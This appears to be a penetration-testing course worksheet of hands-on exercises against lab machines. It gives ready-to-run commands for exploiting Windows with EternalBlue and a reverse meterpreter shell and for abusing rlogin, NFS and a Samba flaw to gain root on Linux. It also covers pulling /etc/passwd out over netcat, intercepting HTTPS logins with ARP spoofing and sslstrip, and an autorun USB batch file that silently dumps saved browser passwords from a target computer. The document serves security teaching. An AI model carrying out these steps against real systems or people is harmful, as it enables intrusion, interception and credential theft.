Practical DAY 3

1. Exploiting Windows
First, lets do some scans:
nmap -sV --osscan-guess -p 1-10000 [IP Address]
nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]
nmap -sU -sV --version-all -p 1-10000 [IP Address]
nmap -v -p 139,445 --script vuln --script-args=unsafe=1 [IP Address]

Now cross check this data with your Nessus results. Which exploit will work?
Let us search for one:
searchsploit remote smb microsoft windows
In the list we can “EternalBlue” MS17-010 SMB exploit”
EternalBlue is one of several tools that were allegedly created and used by the NSA.

Start the Metasploit framework. In Metasploit, and execute the following commands:
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
This is an easy exploit to use so the only thing we need to set is the target IP (RHOST), and select
the payload:
set RHOST 192.168.1.127
set payload windows/x64/meterpreter/reverse_tcp
show options
If Kali IP address is not set, we need to change it (check LHOST setting):
set LHOST Your_IP
exploit
We should now have a shell on the victim
help
shell
whoami

2. Exploiting Linux
a) Missconfigurations
Once again lets do some scans:
nmap -sV --osscan-guess -p 1-10000 [IP Address]
nmap -T4 -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sV --version-all --osscan-guess -A -p 1-10000 [IP Address]
nmap -T4 -PA -sC -sV --version-all --osscan-guess -A -p 1-65535 [IP Address]
nmap -sU -sV --version-all -p 1-10000 [IP Address]
We can see open TCP ports 512, 513, and 514 which are known as "r" services. There is a known
config issue know as ".rhosts + +" situation which allows misconfigured devices to allow remote
access from any host. To take advantage of this we need to install the rsh-client. If you are
prompted for an SSH key during this practical, this means the rsh-client tools have not been
installed and Kali is defaulting to using SSH. Please execute:
 curl -O http://http.us.debian.org/debian/pool/main/n/netkit-rsh/rsh-client_0.17-
17+b1_amd64.deb
dpkg -i rsh-client_0.17-17+b1_amd64.deb
rlogin -l root Target_IP

b) Weaknesses
When looking at the results of the scan the vulnerabilities are showing problems with Network
File System (NFS). NFS can be identified by probing port 2049 directly or asking the portmapper
for a list of services. Let us check this:
rpcinfo -p Target_IP
showmount -e Target_IP
ssh-keygen
mkdir mount
mkdir linux
mount -t nfs 192.168.130.149:/ mount/linux -o nolock
cat ~/.ssh/id_rsa.pub >> /mount/linux/root/.ssh/authorized_keys
umount/mount/linux
ssh [email protected]

c) Vulnerabilities
How about pushing some exploits?
In the scan we saw Port 139 – Samba open and its vulnerable. Samba needs ports 137-139 and
445 for NetBIOS and Active Directory functionality. Metasploit will help again:
use exploit/multi/samba/usermap_script
show options
set RHOST 192.168.130.149
show options
If necessary, set LHOST also
Exploit

d) Exfiltrate
By using Netcat establish a tunnel between your machine and the target and transfer
/etc/passwd file to your device.
Write down all the steps taken!

3. Using SSL Strip

In this exercise you will use the utility sslstrip on Kali Linux to intercept communications meant for an SSL-
encrypted site. Once you’ve completed it, you should have a log file containing information captured
during the session. While you can perform this exercise on any Linux box, it will require you to download
software. If you use Kali Linux 2.0, all tools should be present.
From a command prompt, do the following:
1. Configure Kali to forward incoming packets that were not intended for it or
addressed to it by using the following command:
echo '1 ' > /proc/sys/net/ipv4/ip_forward
2. Learn the network gateway by entering:
Netstat –nr
3. On the list of returned results, note the gateway listed.
4. Use the arpspoof command to redirect traffic intended for other hosts on the network to your host.
Use the following command:
arpspoof -i eth0 192.168.1.1
In this example, eth0 is assumed to be connected to your network. Replace this name with what is
appropriate for your system. You can use ifconfig to determine the active adapter. For the IP address I
used 192.168.1.1; just replace this with the gateway address you learned from the previous step.
5. Set up a firewall rule on the system to redirect traffic from port 80 to 8080. Use the following command,
which uses iptables to create firewall rules:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –
to-port 8080
6. Now run sslstrip and listen on port 8080:
sslstrip -l 8080
7. Open a browser and go to any site that uses SSL, such as Gmail or similar. Note that your browser will
show http instead of https as it would normally for an HTTPS address. This is because sslstrip is
intercepting HTTPS requests and using HTTP instead before sending the traffic on to the intended
recipient.
8. Ctrl+C (stops the attack)
9. In Linux, browse to the SSL Strip folder and open the sslstrip.log file, and you will see the information
that was gathered while sslstrip was running.

4. USB Stealer Method

In order to carry out this attack you can use the following generic steps:
1. Obtain a password-hacking utility such as pspv.exe.
2. Copy the utility to a USB drive.
3. Create a Notepad file called launch.bat containing the following lines:
[autorun]
en = launch.bat
Start pspv.exe /s passwords.txt
start ChromePass.exe / stext chrome.txt
start OperaPassView.exe / stext OperaView.txt
start PasswordFox.exe / stext PasswordFox.txt
taskkill/im pspv.exe
taskkill/im ChromePass.exe
taskkill/im OperaPassView.exe
taskkill/im PasswordFox.exe
4. Save launch.bat to the USB drive.
At this point, you can insert the USB drive into a target computer. The tools will extract passwords, and
place them in the file.

5. Using Netcat
This is a practical example of how to use Netcat in order to establish a connection to a remote
host. For this practical you need either 2 different machines or simply open 2 different terminal
windows.
 a) On the target system, start Netcat by running the following command:
b) nc –l –p 4444 #listen (-l) on a specific port (-p) set to 4444
On another machine client, initiate a connection to the target by issuing the following command:
c) nc <target ip address> 4444
When a console window appears try and enter commands that will be executed on the remote
system.

5a. By looking at your scan report made by Nessus against Linux server lab machine choose one of the
vulnerabilities you believe you can exploit (NOT THE ONE USED IN THIS PRACTICAL). Run the exploit
using Metasploit and create a shell. From victim machine take the etc/passwd file and transfer it to
your attack machine using netcat! Write all the steps you did in order to complete the assignment.

ANSWER:
cat etc/passwd| nc -l -p 4444
To receive file:
nc your.ip 4444 > passwd

6. NULL Sessions
NULL session is Tsed to allow clients or endpoints of a connection to access certain types of information
across the network. NULL sessions are regular Windows feature used for legitimate purposes but the fact
that NULL session can reveal a loth of information is often abused.
NULL session happens when a connection is made to a Windows system without credentials being
provided. This session can only be made to a special location called the interprocess communications (IPC)
share, which is an administrative share. In normal practice, NULL sessions are designed to facilitate a
connection between systems on a network to allow one system to enumerate the process and shares on
the other and get the following:
List of users and groups
List of machines
List of shares
Users and host SIDs
The NULL session allows access to a system using a special account called a NULL user that can be used to
reveal information about system shares or user accounts while not requiring a username or password to
do so.
Exploiting a NULL session is made by just executing a few commands.
For example, if the targets hostname is “win2008” we can connect in a following way:
net use \\ win2008\ipc$ "" "/user:"
Note that the ipc$ share is the IPC share.
To view the shares available on a system, after issuing the command to connect:
net view \\ win2008
Next step is to connect to a share and view the data.
net use s: \\ win2008\(shared folder name)

7. Enumerating Windows machines using UDP packets in SNMP protocol. Below you will find
Windows specific values for enumerating SNMP. Use this information to collect the data from
your target.

1.3.6.1.2.1.25.4.2.1.4 Processes Path

1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports
Example of using snmpwalk command to enumerate the Entire MIB Tree (check you phase2.pdf
for more details).
snmpwalk -c public -v1 -t 10 10.11.1.14 # This command enumerates the entire MIB tree using
the -c option to specify the community string, and -v to specify the SNMP version number; -t 10
increases the timeout period to 10 seconds (as this is using UDP timeout needs to be bigger in
case we have slow responses)
By using above data execute the command and:

a) Enumerate Windows Users

b) Enumerate Running Windows Processes
c) Enumerate Open TCP Ports
d) Enumerating Installed Software